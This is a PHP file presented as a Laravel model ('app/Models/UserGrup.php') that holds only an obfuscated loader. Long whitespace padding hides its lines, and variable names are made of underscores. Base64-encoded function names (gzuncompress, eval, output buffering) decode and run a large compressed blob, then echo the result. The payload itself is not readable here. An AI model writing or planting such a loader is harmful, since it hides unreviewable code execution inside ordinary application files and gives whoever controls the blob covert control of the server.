<?php 
        $__='printf';$_='Loading app/Models/UserGrup.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
